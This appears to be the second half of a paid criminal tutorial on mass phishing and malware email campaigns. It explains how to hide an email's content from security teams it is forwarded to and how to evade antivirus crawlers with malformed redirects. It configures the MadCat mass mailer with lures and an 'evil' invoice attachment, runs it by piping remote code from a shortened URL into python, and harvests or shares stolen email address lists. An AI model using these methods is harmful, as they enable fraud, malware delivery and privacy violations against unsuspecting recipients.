Apple downloads all images in the letter using its servers at the moment the letter gets to the mailbox. Gmail downloads images at the moment the user opens the letter, but first uploads them to its servers, and this does not allow us to determine the recipient's OS, browser and country (by the way, like Apple). However, Outlook downloads images honestly - via a direct link, at the moment the recipient opens the letter. Thanks to this, we can track statistics by OS and browsers, countries and device types.

Let's do the same as we did with the link in the letter: add a shortener to the trust redirect that leads to any image on the Internet. In my opinion, the most beautiful real-time statistics are in the shortener https://dkly.me/. Our tracker will look something like this:

For convenience, we will make the statistics page of our tracker link publicly available in the dkly.me account, and we will be able to easily share it with a partner or client.

How to block forwarding of email to another address​

In fact, we can't. However, we can make life difficult for the recipient of a forwarded letter by visually hiding its contents. Despite the fact that when viewing the source code of the letter, its contents will still be visible, the chance that such a letter will be ignored is significantly higher. And that means our landings will live longer. This is especially useful if the recipient forwarded our letter to the security service, for example. This method has been blocked for several years by all major mail providers, but still works in "private" mail servers, such as Zimbra or Horde WebMail. Well... It's still better than nothing.

When forwarding, the source code of our letter is either placed in the tag <blockquote>, or elements are added before it that display the text added to the original text of the letter (in the case of Outlook, this is the tag <font>). Let's add the following CSS styles to the HTML code of the letter:

<style type="text/css">
font ~ div {width: 10px; height: 5px;}
blockquote div, .quote div {width: 10px; height: 5px;}
</style>

In the code above, we compressed the content of the block <div>following the tag <font>to the size of 10*5pixels (since the style with the size 0*0will be removed by Outlook itself as suspicious). We also compressed 10*5the size of all blocks nested inside the tag <blockquote>or nested in any block with the class to pixels .quote. These manipulations with styles are enough to hide the original content of the letter when displayed in most private email servers where this method still works.

Original email. The body of the email is displayed as expected.

Letter after forwarding to Skiff. The body of the letter is not visible.

While we digest all the information we have received, it's time to recharge.

Excellent. Let's continue.

How to protect a link from automatic analysis by antivirus company crawlers?​

One day our letter will fall into the hands of antivirus companies - first it will be subject to automatic analysis and the content of the links will be checked by a crawler. Depending on the programming language the crawler is built on, our link will be interpreted in different ways. Let's say for example our link looks like this:
https://secure.adnxs.com/seg?redir=///example.com

When loading it, the crawler will receive a redirection indication via the Location header :

Due to the usage, the Location /// header will be incorrect and will be interpreted differently by libraries of different programming languages:

# Curl
just error

# php curl
just error

# python requests
https://secure.adnxs.com/example.com -> 404 error.

# NodeJS http.request
//example.com -> https://example.com

# Google Chrome / Safari
//example.com -> https://example.com

Thus, only crawlers built on the basis of a real browser or NodeJS will be able to correctly obtain the content of our landing page. Our landing page will not be analyzed by other automatic analysis systems of antivirus companies.

Not bad.

Now we have everything ready for sending. Let's move on to the most pleasant part - launching our email campaign.

 

[Man]

Will our letter get into the Outlook inbox? Let's check​

Of the dozens of services for checking email inboxes, the most convenient one is https://glockapps.com/inbox-email-tester/ .

We get his email address from the main page of the checker, and send our letter there in any convenient way from any mailbox (along with the attached files and without touching the randomization with spintax). Glock will forward this letter via MailGun from clean IP addresses to yahoo, gmail, outlook and office365 mailboxes:

Perfect result. Super.

If we didn't get into the outlook inbox, then it's okay. Let's go back to the stage of creating a letter in ChatGPT and go through these steps again (and perhaps again), until glock shows the inbox in outlook.

Now it's time to choose a mailer.

Which mailer is better and what is the difference? Selecting software for mailing and launching a campaign​

Yes, mailers really differ not only in the convenience of the interface. The inbox-rate depends on their internal structure.

Depending on the programming language the mailers are written in, they use different libraries to work with SMTP or interact with the smtp server via raw sockets without using third-party libraries, thus trying to imitate popular email clients (but usually fail miserably at this task ).

Our letter should be accepted as a white mailing, and not as individually sent letters, so there is no point in imitating desktop mail clients.

For mailings, the most commonly used clients are those written in PHP (mail), Python (smtplib), Go (smtplib) and Javascript (smtpJS). All these libraries differ from each other not only in the headers they send, but also in the way they pack the letter, the names of the body chunks and the encoding of the headers and body of the letter. Therefore, Outlook antispam knows approximately which client sent a particular letter.

I did not trust Windows mailers, because there is a very small probability that they imitate not desktop clients, but server ones.

For my mailer I chose python and its smtplib library. It is popular among white sites and a lot of clean letters are sent through it, while (like Go and Javascript) it is rarely used for sending spam.

MadCat Mailer: github.com/aels/mailtools/tree/main/mass-mailer .

It is also designed to run on Linux or MacOS. I did not add support for socks proxy, because in case of using proxy, the percentage of letters that get to the inbox will depend on the purity of the proxy IP address, and not the purity of the IP server on which we launched our smtp checker and checked our smtp servers for delivery to the inbox.

Let's prepare the mailer and launch our mailing. All we need to start is to fill in its configuration file correctly.

Download the config file from the link: raw.githubusercontent.com/aels/mailtools/main/mass-mailer/dummy.config and fill it in as follows:

[madcatmailer]
# dummy config example

# path or url to list with smtp's, of format "server|port|username|password"
smtps_list_file: file_with_our_smtp_servers.txt

# path or url to file with email leads and other email-related data like names etc., separeted by any delimiter.
mails_list_file: /Users/User/Downloads/70k_validated.txt

# comma-separeted list of emails to send test emails to for each new smtp server used. Used to carry inbox-rate statistics.
mails_to_verify: die-hard-us@outlook.com

# From:-field of lure email, all macros are supported
mail_from: Kate Tyler <{{smtp_user}}>

# Subject:-field of lure email , all macros are supported
mail_subject: Hey, {{smtp_host}} are welcoming you!

# path or url to file with email "html" or "txt" body.
# also can be just email body string (useful when you send sms and don't need separate file for email text)
mail_body: /path_to/lure.html

# comma-separeted list of paths or urls to desired attachment files. may be empty. Attachment file names will be picked from original filenames as is (like "invoice.rar" in example)
attachment_files: /path/to/evil/invoice.rar

# path or url to file, filled with redirect-urls to place on {{url}} placeholder inside email body.
# one random line will be picked for each email. may be empty
redirects_file:

# use "add_read_receipts: true" to add "read receipt" headers to your emails. Leave empty if you don't want to add these headers
add_read_receipts:

We don't need a file with redirects, because our trust redirect will be enough for approximately 50,000 letters.

Mailer supports the following macros in headers From, Subject, in the body of the message, and in files attached to the message:

• {{email}}- recipient's email.
• {{email_b64}}- the recipient's email, encoded in base64. Useful when you pass it as a parameter to your phishing.
• {{email_user}}- a fragment of the recipient's email that comes before @. For example, for the mailbox vera.love.dicks@apple.com it will be Vera.love.dicks (the first letter will be replaced with a capital letter). Useful if we don't have the recipient's name in the database, but we need to address him by name or nickname.
• {{email_host}}- recipient's email domain. In our example, it is apple.com .
• {{email_l2_domain}}- in our case it's just apple . Useful if you want to include the name of the company the recipient works for in the letter.
• {{smtp_user}}- the user of the smtp server used to send a particular letter. It is useful to specify it in the From field to arouse less suspicion in the recipient.
• {{smtp_host}}- domain of smtp server. Useful to specify it as the sender company.
• {{url}}- a random redirect from the redirect file will be substituted in place of this macro if you specified the redirect file in the config file.
• {{random_name}}- Random female first and last name. Useful if you want a random sender name.

If your mail list contains additional data in addition to the mails themselves (for example, name, company, position, phone numbers, etc.), with any separator (for example ,, or |or ;or , then the recipient's email is automatically extracted from each line of your mail file, regardless of its position among the other data. The mailer will also automatically download the rest of the data from each line, and each column will be available in the macros {{1}}, {{2}}, {{3}}and so on (starting with the number 1), depending on the number of columns.

In the working directory, from where the mailer will be launched, you can have as many .config-files as you want. The mailer will select for use the config that was edited last.

Now we can run. Let's do it with the following command:

python3 <(curl -slkSL bit.ly/madcatmailer)

I would like to draw your attention once again to the fact that you do not need to download the mailer to your machine, because it does not have an auto-update function. I am constantly adding to it and improving it, and it is better if you always have the latest version from GitHub.

The mailer runs in 40 threads, and this is enough to send 100,000 letters without heavy attachments in ~30 minutes. You can run it in 100 threads without any problems, but then it will be simply inconvenient to control them, because they will not fit on the screen.

SMTP servers will be switched off as they reach the daily limits of letters sent. And the mailer itself will stop when it finishes sending or if there are no more available SMTP servers. If you want to stop it forcibly, press [Ctrl]+[C]on the keyboard.

Time to smile - the process has started. Now from time to time we need to check our test box and make sure that test letters (which the mailer will send for each new smtp server taken into operation) get into the inbox.

Once the mailing is finished, we will check the number of clicks and other statistics by visiting the website of the URL shortener we are using.

Here are my click-through stats after ~90,000 emails sent:

The average CTR in this campaign was not very high - 2.8%.

Depending on the freshness and subject of the mail base, time of day and aggressiveness of the letter text, I managed to get a CTR of up to 4.1%. And I am sure that you will be able to do the same, definitely.

It's hard for me to say what CTR is the norm, but the result we got is more than enough for a 100,000-letter campaign (with zero costs) to bring in $2-3,000. And these are not crazy numbers. In fact, we spent the most important thing on this mailing - our time. All my preparation (including checking smtp servers) took almost four hours. Now we need to let our mail database sit for a week, and tomorrow find (or collect, or steal from a hacked site, or buy) a new fresh database.

If you've read this far, that's great - you've done it. As a nice little bonus, I'm attaching a new American corporate email database with 65,000 addresses: anonfiles.com/Q2Ae55W7y7. Use this database wisely.

Bonus: Where can I start by collecting relatively fresh databases of email addresses?​

The best and freshest databases are obtained by collecting contacts from mailboxes (mailass combo lists). If we do not have such an opportunity, we can collect relatively fresh corporate mails from the familiar archives of URL shorteners: archive.org/details/UrlteamWebCrawls.

As an example, let's take the bit.ly service link base for 2020:
https://archive.org/download/urlteam_2020-06-02-04-17-04/bitly_6.2020-06-02-04-17-04.zip

This archive is full of invitation links to various chats and video conferences. These chats were used mainly by students, but in two years many of them studied, graduated from university and got jobs. Thus, the email addresses collected in this way can be considered mostly corporate.

Let's select all email addresses from our archive using grep with the following command:

grep -Eo "[a-zA-Z0-9._-]+(%40|@)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" bit.ly_urls_2020.txt | sed 's/%40/@/g' >> bit.ly_emails_2020.txt

In the case of bit.ly, from an archive of two million links, I got just under two thousand addresses:

In the case of goo.gl archives, our catch will be more than a hundred thousand addresses from each archive. By repeating the above steps several times, we can collect about a million almost corporate addresses, which most likely have not been used by anyone for sending spam before.

These arrays of email addresses will contain a small amount of garbage, so they must be checked with the validator from the first part of the article.

If we need contacts of technical support and site administrators, we can collect them from the service https://publicwww.com by request "mailto:"

To do this, we will have to buy a paid plan for $50, but the profit from sending to these addresses will be incomparably higher.

We can collect local postal addresses of individual countries for free from the leak aggregator https://phonebook.cz:

The limit for one request in it is 10 thousand addresses, so the selection will also have to be done several times. Spam has undoubtedly already been sent to all these addresses, so the envelope from the mailing will be lower than usual.

Well, that's it... this is the end of our lesson and the beginning of your story. Now it's your turn. It's going to be cool, and that's the main thing.

Afterword​

No one is born with all the knowledge in the world. The main thing we have is a mind hungry for knowledge and the ability to learn. The only difference between a professional and a beginner is that a professional has already made all the possible mistakes, while a beginner has yet to make them. Make mistakes - each of them makes you cooler.

Can you (the reader) publish this material in the public domain?​

The short answer is yes. It's your material. You bought it, and it's yours. You're now free to do with it as you please - it's yours. However, I hope you're wise enough to keep a secret.

Thank you!
Inbox to all of us. Until next time.